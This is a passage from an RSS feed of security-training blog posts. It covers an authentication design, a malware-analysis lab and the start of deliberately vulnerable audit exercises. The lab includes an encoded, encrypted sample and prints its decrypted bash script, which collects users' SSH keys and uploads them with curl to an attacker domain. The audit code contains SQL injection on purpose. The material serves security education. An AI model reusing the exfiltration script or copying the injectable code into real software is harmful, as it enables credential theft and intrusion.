The latest articles on DEV Community by fosres (@fosres). https://dev.to/fosres https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3622242%2Fac30d2be-0d94-4b7f-b0ad-2ad1629fead0.png https://dev.to/fosres en fosres Wed, 08 Apr 2026 23:34:27 +0000 https://dev.to/fosres/introducing-fosres-a-free-and-open-source-security-research-project-4ij6 https://dev.to/fosres/introducing-fosres-a-free-and-open-source-security-research-project-4ij6 <h1> Free and Open Source Security Research (FOSRES) </h1> <p>Hi. I am Tanveer Salim. And usually I let Claude do the talking.</p> <p>For the first time I am actually writing this from scratch.</p> <p>I would like to introduce you to the FOSRES project. A project meant to train future Security Engineers in Web/Cloud/AI Security. In this project you will be challenged to audit and fix others' code for security bugs, deploy applications in secure cloud environments (here I use AWS only for now), and be asked to apply your skills with using AI to reduce project timelines (a necessary skill you need to build now). Just to let you know I have chosen Claude Code as my official AI agent. Other AI Agents I would recommend are Mistral (most privacy friendly although worse at software engineering than Claude), or GLM-5 (not privacy-friendly at all).</p> <p>Below I will explain the required tech skills you want to have:</p> <h2> Topics for FOSRES Challenges </h2> <p>A. Web Security</p> <p>You want to be able to audit and fix code containing any of these vulnerabilities:</p> <ol> <li> <p>Broken Authentication / Authorization</p> <pre class="highlight plaintext"><code>a. Session Cookie Authentication + CSRF b. Password Authentication c. JWT Token Authentication </code></pre> </li> <li><p>Broken SQL Injection</p></li> <li><p>Broken XSS</p></li> <li><p>Server Side Request Forgery</p></li> <li><p>IDOR (Insecure Direct Object Reference)</p></li> <li><p>Missing Rate Limiting</p></li> <li><p>OS Path Traversal</p></li> <li><p>OS Command Injection</p></li> <li><p>Malicious File Uploads</p></li> <li><p>Security Misconfigurations (see Week 14 from 48-week Plan)</p></li> <li><p>API Key Management &amp; Authentication</p></li> <li><p>Security Logging and Monitoring Failures</p></li> <li><p>XXE Entity Bugs</p></li> </ol> <p>B. Cloud Security</p> <p>The only real way to learn Cloud Security is to <em>do</em> it: hence why I am making this project. It is meant to teach you Cloud Security as much as it is meant to teach me.</p> <p>(To Be Determined)</p> <p>C. AI Security</p> <p>(To Be Determined)</p> <h1> Part 1: Authentication System </h1> <p>I will first work with Claude to generate the authentication system. It is my responsibility to audit it. I will be presenting the code as an audit challenge so you are more than welcome to audit it and report bugs if necessary. Find my email in my Dev.to profile to contact me if you find any.</p> <p>Below is a system diagram of the final version of the authentication system:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3d5e4by6w50dnodv8v50.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3d5e4by6w50dnodv8v50.png" alt="Authentication System Design" width="800" height="495"></a></p> <h2> Compliance </h2> <p>I intend the web application to be GDPR compliant (Claude help me with meeting GDPR compliance with AWS).</p> <h2> How Authentication Will Work </h2> <h3> Client-Side Hashing for Registration </h3> <p>Authentication and Encryption inspired by <a href="https://bitwarden.com/assets/lrLsAOcvBsN1vaYAaZQKt/a73a6f46d55cf705423aa7a6a12b7f8a/whitepaper-login.png?w=960&amp;fm=avif" rel="noopener noreferrer">Bitwarden Whitepaper's</a> system diagram for user.</p> <p>The following is ASCII-based art:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>╔════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ CLIENT ║ ║ ┌──────────────────────────────────┐ ║ ║ User Asymmetric Key ┌───▶│ ML-KEM-1024 + X25519 Key Pair │ ║ ║ │ │ ┌─────────────┬──────────────┐ │ ║ ║ ┌───────────────────────────┐ │ │ │ Private Key │ Public Key │ │ ║ ║ │ Argon2ID (KDF) │ │ │ └─────────────┴──────────────┘ │ ║ ║ │ Salt : email address │──────── Master Key┤ └──────────────────────────────────┘ ║ ║ │ Payload: master password │ │ ║ ║ └───────────────────────────┘ │ ┌──────────────────────────────────┐ ║ ║ └───▶│ HKDF-SHA-512 ──▶ Stretched │ ║ ║ │ Master Key │ ║ ║ └─────────────────┬────────────────┘ ║ ║ │ ║ ║ ┌───────────────────────────┐ ▼ ║ ║ │ Argon2ID (KDF) │◀── Master Key ┌───────────────────────────────────────┐ ║ ║ │ Payload: master key │ │ Generated Symmetric Key │ ║ ║ │ Salt : master password │ │ Encryption Key : 256 bits │ ║ ║ └─────────────┬─────────────┘ │ MAC Key : 256 bits │ ║ ║ │ └─────────────┬─────────────────────────┘ ║ ║ │ │ Symmetric Key ║ ║ ▼ │ ║ ║ ┌──────────────────────┐ ┌─────────────────────────┐ │ ┌────────────────────────┐ ║ ║ │ Master Password │ │ 192-bit Nonce (CSPRNG) │───────┼─▶│ XChaCha20-Poly1305 │ ║ ║ │ Hash (SHA-256) │ └─────────────────────────┘ │ │ Nonce : 192-bit │ ║ ║ └──────────────────────┘ ▲ │ │ Payload: sym key │ ║ ║ │ │ Nonce └─▶│ Key: stretched mkey │ ║ ║ │ CSPRNG┘ └──────────┬─────────────┘ ║ ║ │ │ ║ ║ │ ▼ ║ ║ │ ┌───────────────────────────────┐ ║ ║ │ │ Protected Symmetric Key │ ║ ║ │ └───────────────────────────────┘ ║ ╚════════════════╪════════════════════════════════════════════════════╪══════════════════════╝ │ 🔒 https:// │ ▼ ▼ ╔════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ CLOUD ║ ║ ║ ║ KMS – Data Protection Key – XChaCha20-Poly1305 Encryption ║ ║ ┌────────────────────────────────┬───────────────────────────────────────┐ ║ ║ │ SHA-256(Master Password Hash) │ Protected Symmetric Key │ ║ ║ ├────────────────────────────────┴───────────────────────────────────────┤ ║ ║ │ Database with Transparent Data Encryption (TDE) │ ║ ║ ├────────────────────────────────┬───────────────────────────────────────┤ ║ ║ │ SHA-256(Master Password Hash) │ Protected Symmetric Key │ ║ ║ └────────────────────────────────┴───────────────────────────────────────┘ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════════╝ </code></pre> </div> <p>Key Derivation Function: Argon2ID</p> <p>Generated RSA Key Pair --&gt; Replaced with:</p> <p>ML-KEM-1024-X25519 Hybrid for Public Key Encapsulation</p> <p>HKDF: HKDF-SHA-256 which offers 128 bits of quantum security</p> <p>Symmetric Key Algorithm: XChaCha20-Poly1305</p> <p>Support for Cryptography:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Need</th> <th>Python</th> <th>JavaScript</th> </tr> </thead> <tbody> <tr> <td><strong>ML-KEM-1024 + X25519 (your design)</strong></td> <td><strong>Manual combiner: <code>liboqs-python</code> + <code>cryptography</code> + HKDF</strong></td> <td><strong>Manual combiner: <code>mlkem</code> + Web Crypto + <code>@hpke/core</code></strong></td> </tr> </tbody> </table></div> <p>Manual support for the Hybrid Public Key Encryption will be done based on <a href="https://datatracker.ietf.org/doc/rfc9180/" rel="noopener noreferrer">Request for Comments 9180</a>.</p> <p>Python Libraries <code>liboqs-python</code> and <code>cryptography</code> will be used in the backend.</p> <p>Javascript libraries:</p> <h2> Full Stack </h2> <p>All possible backend and frontend frameworks will be visitable, auditable, and therefore hackable by visitors.</p> <p>Backends:</p> <ol> <li>Flask</li> <li>Django</li> <li>FastAPI</li> </ol> <h2> Frontends Featured in the Exercises </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Exercise</th> <th>Backend</th> <th>Frontend</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>FastAPI</td> <td>React</td> </tr> <tr> <td>2</td> <td>Flask</td> <td>React</td> </tr> <tr> <td>3</td> <td>FastAPI</td> <td>React</td> </tr> <tr> <td>4</td> <td>Django</td> <td>Alpine.js</td> </tr> <tr> <td>5</td> <td>Django</td> <td>Next.js (TypeScript)</td> </tr> <tr> <td>6</td> <td>FastAPI</td> <td>Nuxt.js (Vue)</td> </tr> <tr> <td>7</td> <td>Django</td> <td>Angular</td> </tr> </tbody> </table></div> <p><strong>Distinct frontends:</strong> React (×3), Alpine.js, Next.js, Nuxt.js, Angular</p> <h2> Testing </h2> <p>All AI agents must first generate a beta version of the full-stack page of code requested complete with a full test-case suite. The developer must then manually check if the test cases work as well as test with additionl test cases. As a Security Engineer one must check for security bug test cases--and the AI agent must include that in the test case suite where applicable. After the developer has tested through all test cases the developer is strongly encouraed to allow a second, independent AI agent to first verify all test cases as well as additional tests. The developer can then verify the test cases made by the second independent AI.</p> <p>Claude will be responsible for generating code and the first test case suite for each page of full-stack code made. Mistral will be the secondary testing agent. Mistral, unlike Claude, is capable of executing code in a sandbox so Mistral is valuable as a testing agent. Claude is frequently used by developers and Security Engineers for software engineering planning.</p> <h2> See the Ongoing Claude Conversation </h2> <p>I decided to publish the entire conversation I had with Claude to help me write this blog. This is actually the first time I wrote a blog post here from scratch but nonetheless since AI-assisted programming in Security is a very new field I am publishing my entire conversation to help others learn from my good and bad habits as I experiment with it: <a href="https://claude.ai/share/71a81505-a49f-4fee-b2cd-d3ff09009af9" rel="noopener noreferrer">https://claude.ai/share/71a81505-a49f-4fee-b2cd-d3ff09009af9</a></p> security appsec cloudsec opensource fosres Tue, 07 Apr 2026 20:09:34 +0000 https://dev.to/fosres/week-12-malware-analysis-lab-can-you-identify-this-malware-57in https://dev.to/fosres/week-12-malware-analysis-lab-can-you-identify-this-malware-57in <h1> Can You Identify This Malware? </h1> <p><strong>Time:</strong> 60–90 minutes<br><br> <strong>Difficulty:</strong> Intermediate<br><br> <strong>Skills:</strong> BASH CLI, Python Scripting, Applied Cryptography, Encoding Schemes, Linux File Permissions</p> <h2> A Horror Story First </h2> <p>In 2022, a security team at a cloud storage provider discovered an anomaly in their<br> server logs. A file had been uploaded through a legitimate API endpoint — nothing in<br> the filename, content-type header, or file size triggered any automated alerts. The<br> file sat quietly on disk for eleven days.</p> <p>Then a scheduled job — one that processed uploaded files — picked it up, decoded<br> it, and executed it. Within ninety seconds the server had exfiltrated SSH private keys<br> for every user account on the host to an external server registered under a<br> convincingly generic domain name: something indistinguishable from a Linux<br> software update mirror.</p> <p>The attacker never exploited a CVE. They never brute-forced a password. They<br> uploaded a file and waited. The vulnerability was that the server trusted the content<br> of user-uploaded files.</p> <p>This is not a hypothetical. Malicious file uploads that lead to server-side execution<br> are one of the most underestimated attack vectors in production systems. OWASP<br> lists unrestricted file uploads as a critical risk — and for good reason. The damage<br> is always discovered after the fact, and the forensic trail is often cold by then.</p> <h2> Why This Challenge Matters </h2> <p>Most security challenges test one skill in isolation. This one tests five simultaneously<br> — because real incidents don't stay in one lane.</p> <p>When a suspicious file lands on your desk, you need to:</p> <ol> <li>BASH Command Line Interface</li> <li>Python Scripting</li> <li>Applied Cryptography</li> <li>Encoding Schemes</li> <li>Linux File Permissions</li> </ol> <p>If you can work through this challenge without hints, you have the practical skill<br> set to contribute to a real incident investigation.</p> <h2> The Challenge </h2> <p>A file server has been deployed. Shortly after, the engineering team notices a<br> suspicious file on the server. They send it to you and ask you to investigate.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AI5AexdAD2IiaczqOaooQTUvYvrOTtlBM046l0zq3OWGNHrTbAOi96Co4nh+rjwB/eS XwPZixupEx+2fybd37UvRxdXqaiQU4TMTMfhh8Znvu2dB6V9FNyNnnLlcOGR83ZvdtIjIFL0Lo70fMMkXCFgyXFTgIde6Zd/J5oN vziyxA3Y79lbWLDwASuLwVF45lclGAahtm9cJN8y4tFc4DW0xv0XxppTHsjgNTUW93KusEsI6b8p8ArUkz1Pvyas4DPY2RGPLCXe LzIfbv3fFZ/obm1Und0OLuftaAunWCYRv7F5B15zW+rwNGbxrwLrw+/hBowBr6bB6ALKPl2YfBKXZ8bCh4J0BzpKT4iFTvzNSJCK B7/yWK6pJHSnf7Otpa27YNyzzmRV4TVQuDAs7fSHa3OGR//Y8QqU6EumjrPud3QlXTh7jD3zSnfsBplTBoG0wijrd6MHmkauLPtA nyy+KpCmVsIqQvHKhXxS2Zdo1Dk9pjGqY6/UkgTmjO0oxQ3zsweCU3WekW/trjVUUlUT8w+koXBqZAugVXggMThMLZYh6hzCxiwq I+AQt5h+29V/cj2j8FNYv3KDaEA7AYR2j0M9ZRBs+7Fzh1qklrBlKheUMgyC8kw2LgBqUc62E8/BiJiOhKJ7ZE0VO6ZEnMOMAAC1 67rGYwT5OgABiAS6BAAAiuLwsbHEZ/sCAAAAAARZWg== </code></pre> </div> <h3> Question 1 — What is this file? What does it do? How did you determine what it does? </h3> <h3> Question 2 — If this is malware, what mitigating factors might prevent it from working correctly? </h3> <h2> My Solution </h2> <h3> Question 1 </h3> <p>The file carries a malicious BASH script designed to exfiltrate SSH private keys<br> to an attacker-controlled server.</p> <p><strong>How I found out:</strong></p> <p><strong>Step 1.</strong> Copied the base64-encoded contents to <code>/tmp/test.txt</code></p> <p><strong>Step 2.</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">base64</span> <span class="nt">-d</span> /tmp/test.txt <span class="o">&gt;</span> /tmp/suspicious_file.txt </code></pre> </div> <p><strong>Step 3.</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>file /tmp/suspicious_file.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/tmp/suspicious_file.txt: XZ compressed data, checksum CRC64 </code></pre> </div> <p><strong>Step 4.</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>xz <span class="nt">-d</span> /tmp/suspicious_file.txt <span class="o">&gt;</span> /tmp/suspicious_file </code></pre> </div> <p><strong>Step 5.</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> /tmp/suspicious_file </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="nl">"mode"</span><span class="p">:</span><span class="w"> </span><span class="s2">"aes-256-cbc"</span><span class="p">,</span><span class="w"> </span><span class="nl">"key"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Nwu8bVtV0IgF/PLKS8HcknL3wNuUto3sltGP2PGHTgE="</span><span class="p">,</span><span class="w"> </span><span class="nl">"iv"</span><span class="p">:</span><span class="w"> </span><span class="s2">"OzkGR+FoVEa8jCReqisDGw=="</span><span class="p">,</span><span class="w"> </span><span class="nl">"ct"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ovXxLEy3h8OJU0P4md29Wk8zwIlD9NobozB/yS50YaUP3R6MHVAzSAfs9f6HI59Keak0KBHlJ1wkiYcOshyKSDz3YECo8tauHk7589PAOUByLBo6rQtwXBImcLjuowR6dwK76+1ouromzTB+mezc+NWefHks4HeWLPxMxUoSLAqHqUg7YjZYjaLdPfZdd2IH7hKK/HRXHgV0vXS99n4a8WYkHvwNt/yalxS86h7VI0lBsZVs7Cr9HdyRRaN9ra6+WI0jwmwxXIEv7FIs22aXZTtt7Fk88QHcVdBIsPjYKiTiRnHJaNp9XWn5Lnn9EURnmQ+0emDotlm+NhVjA8TGeC4zgvllQMKAlJenY6Q8YEyAfzmVMPwyfaJQl7J3HbVfi4nslzG+jkWUyP/CbYt02t3IClUlUA8sFhr9YJtCknSWU9gUVMjsT4SJjCQ8Cc3s"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The JSON payload contains an AES-256-CBC encrypted blob with the key and IV<br> stored alongside the ciphertext. I wrote the following Python script to decrypt it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> <span class="kn">from</span> <span class="n">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span><span class="p">,</span> <span class="n">unpad</span> <span class="kn">import</span> <span class="n">base64</span> <span class="k">def</span> <span class="nf">encryptaes256_cbc</span><span class="p">(</span><span class="n">key</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">,</span> <span class="n">iv</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">,</span> <span class="n">plaintext</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bytes</span><span class="p">:</span> <span class="sh">"""</span><span class="s"> Encrypts the given plaintext using AES-256-CBC encryption. Parameters: - key: bytes — 32-byte (256-bit) key - iv: bytes — 16-byte (128-bit) initialization vector - plaintext: bytes — plaintext to encrypt Returns: - bytes: encrypted ciphertext Raises: - ValueError: if key is not 32 bytes or IV is not 16 bytes </span><span class="sh">"""</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">32</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Key length should be 32 bytes (256 bits).</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">16</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">IV length should be 16 bytes (128 bits).</span><span class="sh">"</span><span class="p">)</span> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> <span class="n">padded_plaintext</span> <span class="o">=</span> <span class="nf">pad</span><span class="p">(</span><span class="n">plaintext</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">)</span> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">cipher</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span><span class="n">padded_plaintext</span><span class="p">)</span> <span class="k">return</span> <span class="n">ciphertext</span> <span class="k">def</span> <span class="nf">decryptaes256_cbc</span><span class="p">(</span><span class="n">key</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">,</span> <span class="n">iv</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bytes</span><span class="p">:</span> <span class="sh">"""</span><span class="s"> Decrypts the given ciphertext using AES-256-CBC decryption. Parameters: - key: bytes — 32-byte (256-bit) key - iv: bytes — 16-byte (128-bit) initialization vector (same as used during encryption) - ciphertext: bytes — ciphertext to decrypt Returns: - bytes: decrypted plaintext Raises: - ValueError: if key is not 32 bytes or IV is not 16 bytes </span><span class="sh">"""</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">32</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Key length should be 32 bytes (256 bits).</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">16</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">IV length should be 16 bytes (128 bits).</span><span class="sh">"</span><span class="p">)</span> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> <span class="n">decrypted_data</span> <span class="o">=</span> <span class="n">cipher</span><span class="p">.</span><span class="nf">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="n">plaintext</span> <span class="o">=</span> <span class="nf">unpad</span><span class="p">(</span><span class="n">decrypted_data</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">)</span> <span class="k">return</span> <span class="n">plaintext</span> <span class="n">key</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Nwu8bVtV0IgF/PLKS8HcknL3wNuUto3sltGP2PGHTgE=</span><span class="sh">"</span> <span class="n">key_base64</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64decode</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> <span class="n">iv</span> <span class="o">=</span> <span class="sh">"</span><span class="s">OzkGR+FoVEa8jCReqisDGw==</span><span class="sh">"</span> <span class="n">iv_base64</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64decode</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span> <span class="n">ciphertext</span> <span class="o">=</span> <span class="sh">"</span><span class="s">ovXxLEy3h8OJU0P4md29Wk8zwIlD9NobozB/yS50YaUP3R6MHVAzSAfs9f6HI59Keak0KBHlJ1wkiYcOshyKSDz3YECo8tauHk7589PAOUByLBo6rQtwXBImcLjuowR6dwK76+1ouromzTB+mezc+NWefHks4HeWLPxMxUoSLAqHqUg7YjZYjaLdPfZdd2IH7hKK/HRXHgV0vXS99n4a8WYkHvwNt/yalxS86h7VI0lBsZVs7Cr9HdyRRaN9ra6+WI0jwmwxXIEv7FIs22aXZTtt7Fk88QHcVdBIsPjYKiTiRnHJaNp9XWn5Lnn9EURnmQ+0emDotlm+NhVjA8TGeC4zgvllQMKAlJenY6Q8YEyAfzmVMPwyfaJQl7J3HbVfi4nslzG+jkWUyP/CbYt02t3IClUlUA8sFhr9YJtCknSWU9gUVMjsT4SJjCQ8Cc3s</span><span class="sh">"</span> <span class="n">ct_base64</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64decode</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="n">decrypted_plaintext</span> <span class="o">=</span> <span class="nf">decryptaes256_cbc</span><span class="p">(</span><span class="n">key_base64</span><span class="p">,</span> <span class="n">iv_base64</span><span class="p">,</span> <span class="n">ct_base64</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Decrypted plaintext:</span><span class="sh">"</span><span class="p">,</span> <span class="n">decrypted_plaintext</span><span class="p">.</span><span class="nf">decode</span><span class="p">())</span> </code></pre> </div> <p>Decryption revealed the following malicious BASH script:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> <span class="nv">TD</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp </span>d<span class="si">)</span> <span class="nv">TD2</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp </span>d<span class="si">)</span> <span class="nv">HN</span><span class="o">=</span><span class="si">$(</span><span class="nb">hostname</span><span class="si">)</span> find /home/<span class="k">*</span>/.ssh/<span class="k">*</span> <span class="nt">-type</span> f 2&gt;/dev/null | xargs <span class="nt">-I</span> <span class="o">{}</span> <span class="nb">cp</span> <span class="o">{}</span> <span class="s2">"</span><span class="nv">$TD</span><span class="s2">/"</span> <span class="nv">TF</span><span class="o">=</span><span class="s2">"</span><span class="nv">$TD2</span><span class="s2">/</span><span class="nv">$HN</span><span class="s2">.tgz"</span> <span class="nb">tar</span> <span class="nt">-czf</span> <span class="s2">"</span><span class="nv">$TF</span><span class="s2">"</span> <span class="nt">-C</span> <span class="s2">"</span><span class="nv">$TD</span><span class="s2">"</span> <span class="nv">U</span><span class="o">=</span><span class="s2">"https://media.linux-updates.xyz/upload"</span> curl <span class="nt">-X</span> PUT <span class="nt">-H</span> <span class="s2">"Content-Type: application/octet-stream"</span> <span class="nt">--data-binary</span> <span class="s2">"@</span><span class="nv">$TF</span><span class="s2">"</span> <span class="nb">rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$TD2</span><span class="s2">"</span> <span class="nb">rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$TD</span><span class="s2">"</span> </code></pre> </div> <p>The attacker's intent is clear: if the file server decrypts and executes this<br> payload, it copies all SSH private keys from every user's <code>.ssh</code> directory,<br> archives them, and uploads the archive to the attacker's server at <code>U</code>. The file<br> should be deleted immediately and the uploading user banned from the service<br> and reported to the relevant authorities where applicable.</p> <h3> Question 2 </h3> <p>The JSON payload obviously carries a malicious script. Whenever<br> the server must retrieve a file from the payload the server must<br> ensure the executable permissions bit is NEVER set. This way<br> the server cannot execute the BASH script.</p> <p>If the file server offers to run scripts on behalf of the user<br> then the server must execute the script inside a virtualized<br> environment such as a hypervisor or secure container (e.g. Docker)<br> where there is no such secret data stored in the safe environment.<br> This way no dangerous files in the host machine will be compromised.</p> <p>That, and to avoid Malicious File Upload as done in the<br> <code>curl</code> command in the BASH script only a whitelist of domains for<br> requests should be allowed in the safe environment.</p> <p>Finally, ensure the user account in the secure environment<br> has the lowest privileges necessary--so the script shown above<br> cannot access any directories belonging to other users in the<br> <code>home</code> directory.</p> <p><em>If you want more challenges like this one, star the repo:</em><br> <em><a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises</a></em></p> <p><em>What was the hardest part for you? Vote here:</em><br> <em><a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">strawpoll.com/wby5QoKAkyA</a></em></p> security python cryptography malware fosres Sun, 05 Apr 2026 19:18:20 +0000 https://dev.to/fosres/7-full-stack-security-audit-challenges-can-you-find-all-the-bugs-4p1n https://dev.to/fosres/7-full-stack-security-audit-challenges-can-you-find-all-the-bugs-4p1n <h1> 7 Full-Stack Security Audit Challenges: Can You Find All the Bugs? </h1> <p><strong>Time:</strong> Self-paced<br><br> <strong>Difficulty:</strong> Intermediate to Advanced<br><br> <strong>Skills:</strong> Web AppSec, Secure Code Review, Python, JavaScript</p> <h2> The Breach That Changed Everything </h2> <p>In July 2019, a lone attacker compromised over 100 million Capital One customer records — credit card applications, Social Security numbers, bank account data — all from a single misconfigured AWS WAF. The root cause? A Server-Side Request Forgery vulnerability. The WAF's URL-fetching feature made an outbound HTTP request to the AWS metadata endpoint at <code>http://169.254.169.254/</code>, handed back temporary IAM credentials, and the attacker walked straight into an S3 bucket containing a decade of customer data.</p> <p>Capital One paid $190 million in settlements. The attacker was a former AWS engineer who understood exactly which endpoint to hit.</p> <p>The vulnerability wasn't exotic. It wasn't a zero-day. It was a feature — a URL fetcher — that trusted user input without validation. A developer built it. A code reviewer missed it. A security team didn't catch it in production until it was too late.</p> <p>This pattern repeats constantly. The 2017 Equifax breach? Apache Struts with a known CVE sitting unpatched for months. The 2020 Twitter hack? Social engineering into an internal admin panel with no IDOR protection. The 2022 Optus breach? An unauthenticated API endpoint returning customer records with sequential IDs.</p> <p>The vulnerabilities in these stories are the same ones you are about to audit.</p> <h2> Bug Classes Under the Microscope </h2> <p>These seven exercises cover the following vulnerability classes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. Broken Authentication / Authorization a. Session Cookie Authentication + CSRF b. Password Authentication c. JWT Token Authentication 2. SQL Injection 3. XSS (Cross-Site Scripting) 4. Server-Side Request Forgery (SSRF) 5. IDOR (Insecure Direct Object Reference) 6. Missing Rate Limiting 7. OS Path Traversal 8. OS Command Injection 9. Malicious File Uploads 10. Security Misconfigurations 11. API Key Management &amp; Authentication 12. Security Logging and Monitoring Failures </code></pre> </div> <p>Each exercise embeds 3–6 of these classes into a realistic multi-file full-stack application. No labels. No hints. Audit it like a real codebase.</p> <h2> The Rules </h2> <p>For each exercise:</p> <ol> <li> <strong>Find every bug</strong> — identify the file, the vulnerable line, and the bug class</li> <li> <strong>Write a sample payload</strong> — demonstrate how an attacker would exploit it</li> <li> <strong>Fix it</strong> — write corrected code that defends at the right layer</li> </ol> <p>Ready? Let's go.</p> <h2> Exercise 1 — FastAPI + React </h2> <p><strong>App:</strong> User search portal</p> <p><strong><code>main.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Form</span><span class="p">,</span> <span class="n">HTTPException</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">text</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/user</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">get_user</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">user</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">query_params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">)</span> <span class="n">query</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">user</span><span class="si">}</span><span class="sh">'"</span> <span class="n">result</span> <span class="o">=</span> <span 